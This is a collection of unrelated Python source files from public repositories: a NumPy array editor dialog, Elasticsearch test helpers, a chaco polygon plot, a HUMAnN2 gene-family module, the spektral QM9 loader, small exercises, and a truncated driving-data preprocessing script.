        clipboard.setText(cliptxt)


class ArrayEditorWidget(QWidget):
    def __init__(self, parent, data, readonly=False,
                 xlabels=None, ylabels=None):
        QWidget.__init__(self, parent)
        self.data = data
        self.old_data_shape = None
        if len(self.data.shape) == 1:
            self.old_data_shape = self.data.shape
            self.data.shape = (self.data.shape[0], 1)
        elif len(self.data.shape) == 0:
            self.old_data_shape = self.data.shape
            self.data.shape = (1, 1)

        format = SUPPORTED_FORMATS.get(data.dtype.name, '%s')
        self.model = ArrayModel(self.data, format=format, xlabels=xlabels,
                                ylabels=ylabels, readonly=readonly,
                                parent=self)
        self.view = ArrayView(self, self.model, data.dtype, data.shape)

        btn_layout = QHBoxLayout()
        btn_layout.setAlignment(Qt.AlignLeft)
        btn = QPushButton(_("Format"))
        # disable format button for int type
        btn.setEnabled(is_float(data.dtype))
        btn_layout.addWidget(btn)
        btn.clicked.connect(self.change_format)
        btn = QPushButton(_("Resize"))
        btn_layout.addWidget(btn)
        btn.clicked.connect(self.view.resize_to_contents)
        bgcolor = QCheckBox(_('Background color'))
        bgcolor.setChecked(self.model.bgcolor_enabled)
        bgcolor.setEnabled(self.model.bgcolor_enabled)
        bgcolor.stateChanged.connect(self.model.bgcolor)
        btn_layout.addWidget(bgcolor)

        layout = QVBoxLayout()
        layout.addWidget(self.view)
        layout.addLayout(btn_layout)
        self.setLayout(layout)

    def accept_changes(self):
        """Accept changes"""
        for (i, j), value in list(self.model.changes.items()):
            self.data[i, j] = value
        if self.old_data_shape is not None:
            self.data.shape = self.old_data_shape

    def reject_changes(self):
        """Reject changes"""
        if self.old_data_shape is not None:
            self.data.shape = self.old_data_shape

    def change_format(self):
        """Change display format"""
        format, valid = QInputDialog.getText(self, _('Format'),
                                             _("Float formatting"),
                                             QLineEdit.Normal,
                                             self.model.get_format())
        if valid:
            format = str(format)
            try:
                format % 1.1
            except:
                QMessageBox.critical(self, _("Error"),
                                     _("Format (%s) is incorrect") % format)
                return
            self.model.set_format(format)


class ArrayEditor(QDialog):
    """Array Editor Dialog"""
    def __init__(self, parent=None):
        QDialog.__init__(self, parent)

        # Destroying the C++ object right after closing the dialog box,
        # otherwise it may be garbage-collected in another QThread
        # (e.g. the editor's analysis thread in Spyder), thus leading to
        # a segmentation fault on UNIX or an application crash on Windows
        self.setAttribute(Qt.WA_DeleteOnClose)

        self.data = None
        self.arraywidget = None
        self.stack = None
        self.layout = None
        self.btn_save_and_close = None
        self.btn_close = None
        # Values for 3d array editor
        self.dim_indexes = [{}, {}, {}]
        self.last_dim = 0  # Adjust this for changing the startup dimension

    def setup_and_check(self, data, title='', readonly=False,
                        xlabels=None, ylabels=None):
        """
        Setup ArrayEditor:
        return False if data is not supported, True otherwise
        """
        self.data = data
        readonly = readonly or not self.data.flags.writeable
        is_record_array = data.dtype.names is not None
        is_masked_array = isinstance(data, np.ma.MaskedArray)

        if data.ndim > 3:
            self.error(_("Arrays with more than 3 dimensions are not "
                         "supported"))
            return False
        if xlabels is not None and len(xlabels) != self.data.shape[1]:
            self.error(_("The 'xlabels' argument length does not match the "
                         "array column number"))
            return False
        if ylabels is not None and len(ylabels) != self.data.shape[0]:
            self.error(_("The 'ylabels' argument length does not match the "
                         "array row number"))
            return False
        if not is_record_array:
            dtn = data.dtype.name
            if dtn not in SUPPORTED_FORMATS and not dtn.startswith('str') \
                    and not dtn.startswith('unicode'):
                arr = _("%s arrays") % data.dtype.name
                self.error(_("%s are currently not supported") % arr)
                return False

        self.layout = QGridLayout()
        self.setLayout(self.layout)
        self.setWindowIcon(ima.icon('arredit'))
        if title:
            title = to_text_string(title) + " - " + _("NumPy array")
        else:
            title = _("Array editor")
        if readonly:
            title += ' (' + _('read only') + ')'
        self.setWindowTitle(title)
        self.resize(600, 500)

        # Stack widget
        self.stack = QStackedWidget(self)
        if is_record_array:
            for name in data.dtype.names:
                self.stack.addWidget(ArrayEditorWidget(self, data[name],
                                                       readonly, xlabels,
                                                       ylabels))
        elif is_masked_array:
            self.stack.addWidget(ArrayEditorWidget(self, data, readonly,
                                                   xlabels, ylabels))
            self.stack.addWidget(ArrayEditorWidget(self, data.data, readonly,
                                                   xlabels, ylabels))
            self.stack.addWidget(ArrayEditorWidget(self, data.mask, readonly,
                                                   xlabels, ylabels))
        elif data.ndim == 3:
            pass
        else:
            self.stack.addWidget(ArrayEditorWidget(self, data, readonly,
                                                   xlabels, ylabels))
        self.arraywidget = self.stack.currentWidget()
        if self.arraywidget:
            self.arraywidget.model.dataChanged.connect(
                self.save_and_close_enable)
        self.stack.currentChanged.connect(self.current_widget_changed)
        self.layout.addWidget(self.stack, 1, 0)

        # Buttons configuration
        btn_layout = QHBoxLayout()
        if is_record_array or is_masked_array or data.ndim == 3:
            if is_record_array:
                btn_layout.addWidget(QLabel(_("Record array fields:")))
                names = []
                for name in data.dtype.names:
                    field = data.dtype.fields[name]
                    text = name
                    if len(field) >= 3:
                        title = field[2]
                        if not is_text_string(title):
                            title = repr(title)
                        text += ' - ' + title
                    names.append(text)
            else:
                names = [_('Masked data'), _('Data'), _('Mask')]
            if data.ndim == 3:
                # QSpinBox
                self.index_spin = QSpinBox(self, keyboardTracking=False)
                self.index_spin.valueChanged.connect(self.change_active_widget)
                # QComboBox
                names = [str(i) for i in range(3)]
                ra_combo = QComboBox(self)
                ra_combo.addItems(names)
                ra_combo.currentIndexChanged.connect(self.current_dim_changed)
                # Adding the widgets to layout
                label = QLabel(_("Axis:"))
                btn_layout.addWidget(label)
                btn_layout.addWidget(ra_combo)
                self.shape_label = QLabel()
                btn_layout.addWidget(self.shape_label)
                label = QLabel(_("Index:"))
                btn_layout.addWidget(label)
                btn_layout.addWidget(self.index_spin)
                self.slicing_label = QLabel()
                btn_layout.addWidget(self.slicing_label)
                # set the widget to display when launched
                self.current_dim_changed(self.last_dim)
            else:
                ra_combo = QComboBox(self)
                ra_combo.currentIndexChanged.connect(self.stack.setCurrentIndex)
                ra_combo.addItems(names)
                btn_layout.addWidget(ra_combo)
            if is_masked_array:
                label = QLabel(
                    _("<u>Warning</u>: changes are applied separately"))
                label.setToolTip(_("For performance reasons, changes applied "
                                   "to masked array won't be reflected in "
                                   "array's data (and vice-versa)."))
                btn_layout.addWidget(label)
        btn_layout.addStretch()

        if not readonly:
            self.btn_save_and_close = QPushButton(_('Save and Close'))
            self.btn_save_and_close.setDisabled(True)
            self.btn_save_and_close.clicked.connect(self.accept)
            btn_layout.addWidget(self.btn_save_and_close)

        self.btn_close = QPushButton(_('Close'))
        self.btn_close.setAutoDefault(True)
        self.btn_close.setDefault(True)
        self.btn_close.clicked.connect(self.reject)
        btn_layout.addWidget(self.btn_close)
        self.layout.addLayout(btn_layout, 2, 0)

        self.setMinimumSize(400, 300)

        # Make the dialog act as a window
        self.setWindowFlags(Qt.Window)

        return True

    @Slot(QModelIndex, QModelIndex)
    def save_and_close_enable(self, left_top, bottom_right):
        """Handle the data change event to enable the save and close button."""
        if self.btn_save_and_close:
            self.btn_save_and_close.setEnabled(True)
            self.btn_save_and_close.setAutoDefault(True)
            self.btn_save_and_close.setDefault(True)

    def current_widget_changed(self, index):
        self.arraywidget = self.stack.widget(index)
        self.arraywidget.model.dataChanged.connect(self.save_and_close_enable)

    def change_active_widget(self, index):
        """
        This is implemented for handling negative values in index for
        3d arrays, to give the same behavior as slicing
        """
        string_index = [':'] * 3
        string_index[self.last_dim] = '<font color=red>%i</font>'
        self.slicing_label.setText((r"Slicing: [" + ", ".join(string_index) +
                                    "]") % index)
        if index < 0:
            data_index = self.data.shape[self.last_dim] + index
        else:
            data_index = index
        slice_index = [slice(None)] * 3
        slice_index[self.last_dim] = data_index

        stack_index = self.dim_indexes[self.last_dim].get(data_index)
        if stack_index is None:
            stack_index = self.stack.count()
            try:
                self.stack.addWidget(ArrayEditorWidget(
                    self, self.data[tuple(slice_index)]))
            except IndexError:  # Handle arrays of size 0 in one axis
                self.stack.addWidget(ArrayEditorWidget(self, self.data))
            self.dim_indexes[self.last_dim][data_index] = stack_index
            self.stack.update()
        self.stack.setCurrentIndex(stack_index)

    def current_dim_changed(self, index):
        """
        This changes the active axis the array editor is plotting over
        in 3D
        """
        self.last_dim = index
        string_size = ['%i'] * 3
        string_size[index] = '<font color=red>%i</font>'
        self.shape_label.setText(('Shape: (' + ', '.join(string_size) +
                                  ') ') % self.data.shape)
        if self.index_spin.value() != 0:
            self.index_spin.setValue(0)
        else:
            # this is done since if the value is currently 0 it does not emit
            # currentIndexChanged(int)
            self.change_active_widget(0)
        self.index_spin.setRange(-self.data.shape[index],
                                 self.data.shape[index] - 1)

    @Slot()
    def accept(self):
        """Reimplement Qt method"""
        for index in range(self.stack.count()):
            self.stack.widget(index).accept_changes()
        QDialog.accept(self)

    def get_value(self):
        """Return modified array -- this is *not* a copy"""
        # It is important to avoid accessing Qt C++ object as it has probably
        # already been destroyed, due to the Qt.WA_DeleteOnClose attribute
        return self.data

    def error(self, message):
        """An error occurred, closing the dialog box"""
        QMessageBox.critical(self, _("Array editor"), message)
        self.setAttribute(Qt.WA_DeleteOnClose)
        self.reject()

    @Slot()
    def reject(self):
        """Reimplement Qt method"""
        if self.arraywidget is not None:
            for index in range(self.stack.count()):
                self.stack.widget(index).reject_changes()
        QDialog.reject(self)
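A minimal usage sketch for the dialog above (illustrative only: it assumes a running QApplication and the module's own imports; the array and title are made up):

import numpy as np

arr = np.arange(20.0).reshape(4, 5)
dialog = ArrayEditor()
# setup_and_check() returns False for unsupported shapes/dtypes
if dialog.setup_and_check(arr, title="demo"):
    if dialog.exec_():               # modal loop; accept() applies edits
        edited = dialog.get_value()  # the same array object, not a copy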
1.796875
2
libbeat/tests/system/idxmgmt.py
dddpaul/beats
4
1832
import datetime
import unittest

import pytest
from elasticsearch import NotFoundError


class IdxMgmt(unittest.TestCase):

    def __init__(self, client, index):
        self._client = client
        self._index = index if index != '' and index != '*' else 'mockbeat'

    def needs_init(self, s):
        return s == '' or s == '*'

    def delete(self, indices=[], policies=[]):
        indices = list([x for x in indices if x != ''])
        if not indices:
            indices = [self._index]
        for i in indices:
            self.delete_index_and_alias(i)
            self.delete_template(template=i)
        for i in [x for x in policies if x != '']:
            self.delete_policy(i)

    def delete_index_and_alias(self, index=""):
        if self.needs_init(index):
            index = self._index
        try:
            self._client.transport.perform_request('DELETE', "/" + index + "*")
        except NotFoundError:
            pass

    def delete_template(self, template=""):
        if self.needs_init(template):
            template = self._index
        try:
            self._client.transport.perform_request('DELETE', "/_template/" + template + "*")
        except NotFoundError:
            pass

    def delete_policy(self, policy):
        # Delete any existing policy starting with the given policy name
        policies = self._client.transport.perform_request('GET', "/_ilm/policy")
        for p, _ in policies.items():
            if not p.startswith(policy):
                continue
            try:
                self._client.transport.perform_request('DELETE', "/_ilm/policy/" + p)
            except NotFoundError:
                pass

    def assert_index_template_not_loaded(self, template):
        with pytest.raises(NotFoundError):
            self._client.transport.perform_request('GET', '/_template/' + template)

    def assert_index_template_loaded(self, template):
        resp = self._client.transport.perform_request('GET', '/_template/' + template)
        assert template in resp
        assert "lifecycle" not in resp[template]["settings"]["index"]

    def assert_ilm_template_loaded(self, template, policy, alias):
        resp = self._client.transport.perform_request('GET', '/_template/' + template)
        assert resp[template]["settings"]["index"]["lifecycle"]["name"] == policy
        assert resp[template]["settings"]["index"]["lifecycle"]["rollover_alias"] == alias

    def assert_index_template_index_pattern(self, template, index_pattern):
        resp = self._client.transport.perform_request('GET', '/_template/' + template)
        assert template in resp
        assert resp[template]["index_patterns"] == index_pattern

    def assert_alias_not_created(self, alias):
        resp = self._client.transport.perform_request('GET', '/_alias')
        for name, entry in resp.items():
            if alias not in name:
                continue
            assert entry["aliases"] == {}, entry["aliases"]

    def assert_alias_created(self, alias, pattern=None):
        if pattern is None:
            pattern = self.default_pattern()
        name = alias + "-" + pattern
        resp = self._client.transport.perform_request('GET', '/_alias/' + alias)
        assert name in resp
        assert resp[name]["aliases"][alias]["is_write_index"] == True

    def assert_policy_not_created(self, policy):
        with pytest.raises(NotFoundError):
            self._client.transport.perform_request('GET', '/_ilm/policy/' + policy)

    def assert_policy_created(self, policy):
        resp = self._client.transport.perform_request('GET', '/_ilm/policy/' + policy)
        assert policy in resp
        assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_size"] == "50gb"
        assert resp[policy]["policy"]["phases"]["hot"]["actions"]["rollover"]["max_age"] == "30d"

    def assert_docs_written_to_alias(self, alias, pattern=None):
        # Refresh the indices to guarantee all documents are available
        # through the _search API.
        self._client.transport.perform_request('POST', '/_refresh')
        if pattern is None:
            pattern = self.default_pattern()
        name = alias + "-" + pattern
        data = self._client.transport.perform_request('GET', '/' + name + '/_search')
        self.assertGreater(data["hits"]["total"]["value"], 0)

    def default_pattern(self):
        d = datetime.datetime.now().strftime("%Y.%m.%d")
        return d + "-000001"

    def index_for(self, alias, pattern=None):
        if pattern is None:
            pattern = self.default_pattern()
        return "{}-{}".format(alias, pattern)
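A hedged usage sketch for this helper (the localhost URL and the "mockbeat" names are illustrative; any client exposing transport.perform_request should work):

from elasticsearch import Elasticsearch

es = Elasticsearch(["http://localhost:9200"])
idx = IdxMgmt(es, index="mockbeat")
idx.delete(indices=["mockbeat"], policies=["mockbeat"])  # start from a clean slate
# ... run the beat under test, then verify:
idx.assert_index_template_loaded("mockbeat")
idx.assert_docs_written_to_alias("mockbeat")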
2.234375
2
chaco/polygon_plot.py
burnpanck/chaco
3
1833
""" Defines the PolygonPlot class. """ from __future__ import with_statement # Major library imports import numpy as np # Enthought library imports. from enable.api import LineStyle, black_color_trait, \ transparent_color_trait from kiva.agg import points_in_polygon from traits.api import Enum, Float, Tuple, Property, cached_property, \ on_trait_change # Local imports. from base_xy_plot import BaseXYPlot class PolygonPlot(BaseXYPlot): """ Plots a polygon in dataspace. Assuming that the index and value mappers are linear mappers, and that "index" corresponds to X-coordinates and "value" corresponds to Y-coordinates, the points are arranged in a counter-clockwise fashion. The polygon is closed automatically, so there is no need to reproduce the first point as the last point. Nonlinear mappers are possible, but the results may be unexpected. Only the data-space points are mapped in a nonlinear fashion. Straight lines connecting them in a linear screen-space become curved in a nonlinear screen-space; however, the drawing still contains straight lines in screen-space. If you don't want the edge of the polygon to be drawn, set **edge_color** to transparent; don't try to do this by setting **edge_width** to 0. In some drawing systems, such as PostScript, a line width of 0 means to make the line as small as possible while still putting ink on the page. """ # The color of the line on the edge of the polygon. edge_color = black_color_trait # The thickness of the edge of the polygon. edge_width = Float(1.0) # The line dash style for the edge of the polygon. edge_style = LineStyle # The color of the face of the polygon. face_color = transparent_color_trait # Override the hittest_type trait inherited from BaseXYPlot hittest_type = Enum("poly", "point", "line") # The RGBA tuple for rendering edges. It is always a tuple of length 4. # It has the same RGB values as edge_color_, and its alpha value is the # alpha value of self.edge_color multiplied by self.alpha. effective_edge_color = Property(Tuple, depends_on=['edge_color', 'alpha']) # The RGBA tuple for rendering the face. It is always a tuple of length 4. # It has the same RGB values as face_color_, and its alpha value is the # alpha value of self.face_color multiplied by self.alpha. effective_face_color = Property(Tuple, depends_on=['face_color', 'alpha']) #---------------------------------------------------------------------- # Private 'BaseXYPlot' interface #---------------------------------------------------------------------- def _gather_points(self): """ Collects the data points that are within the bounds of the plot and caches them. """ if self._cache_valid: return index = self.index.get_data() value = self.value.get_data() if not self.index or not self.value: return if len(index) == 0 or len(value) == 0 or len(index) != len(value): self._cached_data_pts = [] self._cache_valid = True return points = np.transpose(np.array((index,value))) self._cached_data_pts = points self._cache_valid = True def _render(self, gc, points): """ Renders an Nx2 array of screen-space points as a polygon. """ with gc: gc.clip_to_rect(self.x, self.y, self.width, self.height) gc.set_stroke_color(self.effective_edge_color) gc.set_line_width(self.edge_width) gc.set_line_dash(self.edge_style_) gc.set_fill_color(self.effective_face_color) gc.lines(points) gc.close_path() gc.draw_path() def _render_icon(self, gc, x, y, width, height): """ Renders a representation of this plot as an icon into the box defined by the parameters. Used by the legend. 
""" with gc: gc.set_stroke_color(self.effective_edge_color) gc.set_line_width(self.edge_width) gc.set_fill_color(self.effective_face_color) if hasattr(self, 'line_style_'): gc.set_line_dash(self.line_style_) gc.draw_rect((x,y,width,height)) return def hittest(self, screen_pt, threshold=7.0, return_distance=False): """ Performs point-in-polygon testing or point/line proximity testing. If self.hittest_type is "line" or "point", then behaves like the parent class BaseXYPlot.hittest(). If self.hittest_type is "poly", then returns True if the given point is inside the polygon, and False otherwise. """ if self.hittest_type in ("line", "point"): return BaseXYPlot.hittest(self, screen_pt, threshold, return_distance) data_pt = self.map_data(screen_pt, all_values=True) index = self.index.get_data() value = self.value.get_data() poly = np.vstack((index,value)).T if points_in_polygon([data_pt], poly)[0] == 1: return True else: return False #------------------------------------------------------------------------ # Event handlers #------------------------------------------------------------------------ @on_trait_change('edge_color, edge_width, edge_style, face_color, alpha') def _attributes_changed(self): self.invalidate_draw() self.request_redraw() #------------------------------------------------------------------------ # Property getters #------------------------------------------------------------------------ @cached_property def _get_effective_edge_color(self): if len(self.edge_color_) == 4: edge_alpha = self.edge_color_[-1] else: edge_alpha = 1.0 c = self.edge_color_[:3] + (edge_alpha * self.alpha,) return c @cached_property def _get_effective_face_color(self): if len(self.face_color_) == 4: face_alpha = self.face_color_[-1] else: face_alpha = 1.0 c = self.face_color_[:3] + (face_alpha * self.alpha,) return c
2.71875
3
webapp/template_config.py
evgenyss/investing
0
1834
import os
from datetime import timedelta

basedir = os.path.abspath(os.path.dirname(__file__))

API_DATA_URL = "https://invest-public-api.tinkoff.ru/rest/tinkoff.public.invest.api.contract.v1.InstrumentsService/"
API_LASTPRICES_URL = "https://invest-public-api.tinkoff.ru/rest/\
tinkoff.public.invest.api.contract.v1.MarketDataService/GetLastPrices"

SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, '..', 'webapp.db')
REMEMBER_COOKIE_DURATION = timedelta(days=1)
SQLALCHEMY_TRACK_MODIFICATIONS = False

SECRET_KEY = ""
API_TOKEN = ""
1.96875
2
humann2/quantify/families.py
dytk2134/humann2
0
1835
"""
HUMAnN2: quantify_families module
Compute alignments by gene family

Copyright (c) 2014 Harvard School of Public Health

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""

import os
import logging
import math

from .. import config
from .. import utilities
from .. import store

# name global logging instance
logger = logging.getLogger(__name__)


def gene_families(alignments, gene_scores, unaligned_reads_count):
    """
    Compute the gene families from the alignments
    """

    logger.debug("Compute gene families")

    # Compute scores for each gene family for each bug set
    alignments.convert_alignments_to_gene_scores(gene_scores)

    # Process the gene id to names mappings
    gene_names = store.Names(config.gene_family_name_mapping_file)

    delimiter = config.output_file_column_delimiter
    category_delimiter = config.output_file_category_delimiter

    # Write the scores ordered with the top first
    column_name = config.file_basename + "_Abundance-RPKs"
    if config.remove_column_description_output:
        column_name = config.file_basename
    tsv_output = ["# Gene Family" + delimiter + column_name]

    # Add the unaligned reads count
    tsv_output.append(config.unmapped_gene_name + delimiter +
                      utilities.format_float_to_string(unaligned_reads_count))

    # Print out the gene families with those with the highest scores first
    for gene in gene_scores.gene_list_sorted_by_score("all"):
        all_score = gene_scores.get_score("all", gene)
        if all_score > 0:
            gene_name = gene_names.get_name(gene)
            # Print the computation of all bugs for gene family
            tsv_output.append(gene_name + delimiter +
                              utilities.format_float_to_string(all_score))
            # Process and print per bug if selected
            if not config.remove_stratified_output:
                # Print scores per bug for family ordered with those with the
                # highest values first
                scores_by_bug = gene_scores.get_scores_for_gene_by_bug(gene)
                for bug in utilities.double_sort(scores_by_bug):
                    if scores_by_bug[bug] > 0:
                        tsv_output.append(gene_name + category_delimiter +
                                          bug + delimiter +
                                          utilities.format_float_to_string(scores_by_bug[bug]))

    if config.output_format == "biom":
        # Open a temp file if a conversion to biom is selected
        tmpfile = utilities.unnamed_temp_file()
        file_handle = open(tmpfile, 'w')
        file_handle.write("\n".join(tsv_output))
        file_handle.close()

        utilities.tsv_to_biom(tmpfile, config.genefamilies_file, "Gene")
    else:
        # Write output as tsv format
        file_handle = open(config.genefamilies_file, "w")
        file_handle.write("\n".join(tsv_output))
        file_handle.close()

    return config.genefamilies_file
2.21875
2
Buta Nicolae/threads.py
RazvanBalau/parallel-2020
0
1836
import threading
from multiprocessing import Queue

results = []
results2 = []


def take_numbers(q):
    print('Enter the numbers:')
    for i in range(0, 3):
        num1 = int(input('Enter first number: '))
        num2 = int(input('Enter second number: '))
        q.put(num1)
        q.put(num2)


def add_num(q):
    for i in range(0, 3):
        num1 = q.get()
        num2 = q.get()
        results.append(num1 + num2)
        results2.append(num1 - num2)


q = Queue()
t2 = threading.Thread(target=add_num, args=(q, ))
t1 = threading.Thread(target=take_numbers, args=(q, ))
t2.start()
t1.start()
t2.join()
t1.join()
q.close()

for result in results:
    print("adunare =", result)
for result in results2:
    print("scadere =", result)
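Since the workers here are threads, the standard-library queue.Queue is the more usual channel than multiprocessing.Queue; a deterministic sketch of the same producer/consumer pattern (input() replaced by a preset list for illustration):

import queue
import threading

def producer(q, pairs):
    for a, b in pairs:
        q.put(a)
        q.put(b)

def consumer(q, n, sums, diffs):
    for _ in range(n):
        a = q.get()   # blocks until the producer has put a value
        b = q.get()
        sums.append(a + b)
        diffs.append(a - b)

q = queue.Queue()
sums, diffs = [], []
pairs = [(3, 1), (10, 4), (7, 7)]
t2 = threading.Thread(target=consumer, args=(q, len(pairs), sums, diffs))
t1 = threading.Thread(target=producer, args=(q, pairs))
t2.start(); t1.start()
t1.join(); t2.join()
print(sums, diffs)   # [4, 14, 14] [2, 6, 0]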
3.765625
4
code_week11_76_712/unique_paths.py
dylanlee101/leetcode
0
1837
'''
A robot is located at the top-left corner of an m x n grid (marked "Start").
The robot can only move down or right one step at a time. It is trying to
reach the bottom-right corner of the grid (marked "Finish").
How many distinct paths are there in total?

For example, consider a 7 x 3 grid: how many possible paths are there?

Example 1:

Input: m = 3, n = 2
Output: 3
Explanation:
Starting from the top-left corner, there are 3 paths to the bottom-right corner:
1. Right -> Right -> Down
2. Right -> Down -> Right
3. Down -> Right -> Right

Example 2:

Input: m = 7, n = 3
Output: 28

Source: LeetCode
Link: https://leetcode-cn.com/problems/unique-paths
'''


class Solution:
    def uniquePaths(self, m: int, n: int) -> int:
        dp = [1] + [0] * n
        for i in range(m):
            for j in range(n):
                dp[j] = dp[j] + dp[j - 1]
        return dp[-2]
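The rolling one-dimensional DP works because dp[j] accumulates the paths from above (its old value) and from the left (dp[j-1]), while the layout [1] + [0] * n keeps dp[-1] == 0 so the wrap-around read never pollutes column 0. A quick check against the examples above:

s = Solution()
print(s.uniquePaths(3, 2))  # 3
print(s.uniquePaths(7, 3))  # 28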
3.6875
4
spektral/datasets/qm9.py
JonaBecher/spektral
2,145
1838
import os
import os.path as osp

import numpy as np
from joblib import Parallel, delayed
from tensorflow.keras.utils import get_file
from tqdm import tqdm

from spektral.data import Dataset, Graph
from spektral.utils import label_to_one_hot, sparse
from spektral.utils.io import load_csv, load_sdf

ATOM_TYPES = [1, 6, 7, 8, 9]
BOND_TYPES = [1, 2, 3, 4]


class QM9(Dataset):
    """
    The QM9 chemical data set of small molecules.

    In this dataset, nodes represent atoms and edges represent chemical bonds.
    There are 5 possible atom types (H, C, N, O, F) and 4 bond types (single,
    double, triple, aromatic).

    Node features represent the chemical properties of each atom and include:

    - The atomic number, one-hot encoded;
    - The atom's position in the X, Y, and Z dimensions;
    - The atomic charge;
    - The mass difference from the monoisotope;

    The edge features represent the type of chemical bond between two atoms,
    one-hot encoded.

    Each graph has a 19-dimensional label for regression.

    **Arguments**

    - `amount`: int, load this many molecules instead of the full dataset
      (useful for debugging).
    - `n_jobs`: number of CPU cores to use for reading the data (-1, to use
      all available cores).
    """

    url = "https://deepchemdata.s3-us-west-1.amazonaws.com/datasets/gdb9.tar.gz"

    def __init__(self, amount=None, n_jobs=1, **kwargs):
        self.amount = amount
        self.n_jobs = n_jobs
        super().__init__(**kwargs)

    def download(self):
        get_file(
            "qm9.tar.gz",
            self.url,
            extract=True,
            cache_dir=self.path,
            cache_subdir=self.path,
        )
        os.remove(osp.join(self.path, "qm9.tar.gz"))

    def read(self):
        print("Loading QM9 dataset.")
        sdf_file = osp.join(self.path, "gdb9.sdf")
        data = load_sdf(sdf_file, amount=self.amount)  # Internal SDF format

        def read_mol(mol):
            x = np.array([atom_to_feature(atom) for atom in mol["atoms"]])
            a, e = mol_to_adj(mol)
            return x, a, e

        data = Parallel(n_jobs=self.n_jobs)(
            delayed(read_mol)(mol) for mol in tqdm(data, ncols=80)
        )
        x_list, a_list, e_list = list(zip(*data))

        # Load labels
        labels_file = osp.join(self.path, "gdb9.sdf.csv")
        labels = load_csv(labels_file)
        labels = labels.set_index("mol_id").values
        if self.amount is not None:
            labels = labels[: self.amount]

        return [
            Graph(x=x, a=a, e=e, y=y)
            for x, a, e, y in zip(x_list, a_list, e_list, labels)
        ]


def atom_to_feature(atom):
    atomic_num = label_to_one_hot(atom["atomic_num"], ATOM_TYPES)
    coords = atom["coords"]
    charge = atom["charge"]
    iso = atom["iso"]

    return np.concatenate((atomic_num, coords, [charge, iso]), -1)


def mol_to_adj(mol):
    row, col, edge_features = [], [], []
    for bond in mol["bonds"]:
        start, end = bond["start_atom"], bond["end_atom"]
        row += [start, end]
        col += [end, start]
        edge_features += [bond["type"]] * 2

    a, e = sparse.edge_index_to_matrix(
        edge_index=np.array((row, col)).T,
        edge_weight=np.ones_like(row),
        edge_features=label_to_one_hot(edge_features, BOND_TYPES),
    )
    return a, e
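A hedged usage sketch (standard spektral Dataset access; amount=100 keeps the first download and parse quick):

dataset = QM9(amount=100, n_jobs=-1)   # downloads gdb9.tar.gz on first use
graph = dataset[0]                     # a spektral.data.Graph
print(graph.x.shape,                   # node features
      graph.e.shape,                   # one-hot bond features
      graph.y.shape)                   # 19 regression targets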
2.4375
2
code/Level 1 - Intro to CPX/5-acceleration/main.py
tscofield/cpx-training
0
1839
from adafruit_circuitplayground.express import cpx

# Main loop gets x, y and z axis acceleration, prints the values, and turns on
# red, green and blue, at levels related to the x, y and z values.
while True:
    if cpx.switch:
        print("Slide switch off!")
        cpx.pixels.fill((0, 0, 0))
        continue
    else:
        R = 0
        G = 0
        B = 0
        x, y, z = cpx.acceleration
        print((x, y, z))
        if x:
            R = R + abs(int(x))
        if y:
            G = G + abs(int(y))
        if z:
            B = B + abs(int(z))
        cpx.pixels.fill((R, G, B))
3.1875
3
src/data_preprocess.py
QinganZhao/ML-based-driving-motion-prediction
18
1840
import numpy as np
import matplotlib.pyplot as plt
import matplotlib as mpl
import matplotlib.patches as patches


def load_data(file_name, car_flag):
    if car_flag == 1:
        data = np.loadtxt('./car1/' + str(file_name))
    elif car_flag == 2:
        data = np.loadtxt('./car2/' + str(file_name))
    return data


def get_low_freq_data(data):
    """
    Return a data matrix with 0.1s per time step data. (from 0.01s data)
    """
    matrix = np.zeros((1, data.shape[1]))
    for i in range(data.shape[0]):
        if i % 10 == 0:
            matrix = np.concatenate((matrix, data[i, :].reshape(1, data.shape[1])), axis=0)
    return matrix[1:, :]


def data_process():
    """
    This function serves to concatenate the information of two cars into one array.

    Note: car1 -- mainlane car; car2 -- merging car;

    OutFormat:
        0  case_ID
        1  frame_ID
        2  car1_long_pos
        3  car1_long_vel
        4  car1_lateral_pos
        5  car1_lateral_displacement
        6  car2_long_pos
        7  car2_long_vel
        8  car2_lateral_pos
        9  car2_lateral_displacement
        10 relative_long_vel (merge - mainlane)
        11 relative_lateral_distance (merge - mainlane)
        12 relative_long_distance (merge - mainlane)
        13 car1_yaw
        14 car2_yaw
        15 situation label: (0: car1 yields car2; 1: car2 yields car1)
    """
    data_matrix = np.zeros((1, 16))
    for i in range(128):
        file_name_1 = 'data_' + str(i) + '_1.txt'
        file_name_2 = 'data_' + str(i) + '_2.txt'
        car1 = get_low_freq_data(load_data(file_name_1, 1))
        car2 = get_low_freq_data(load_data(file_name_2, 2))
        T = int(car1.shape[0])
        # print(T)
        current_data_matrix = np.zeros((T, 16))
        for j in range(1, T):
            current_data_matrix[j, 0] = i
            current_data_matrix[j, 1] = j
            current_data_matrix[j, 2] = car1[j, 1]
            current_data_matrix[j, 3] = 10 * (car1[j, 1] - car1[j-1, 1])
            current_data_matrix[j, 4] = car1[j, 2]
            current_data_matrix[j, 5] = car1[j, 2] - car1[j-1, 2]
            current_data_matrix[j, 6] = car2[j, 1]
            current_data_matrix[j, 7] = 10 * (car2[j, 1] - car2[j-1, 1])
            current_data_matrix[j, 8] = car2[j, 2]
            current_data_matrix[j, 9] = car2[j, 2] - car2[j-1, 2]
            current_data_matrix[j, 10] = current_data_matrix[j, 7] - current_data_matrix[j, 3]
            current_data_matrix[j, 11] = current_data_matrix[j, 8] - current_data_matrix[j, 4]
            current_data_matrix[j, 12] = current_data_matrix[j, 6] - current_data_matrix[j, 2]
            current_data_matrix[j, 13] = car1[j, 3]
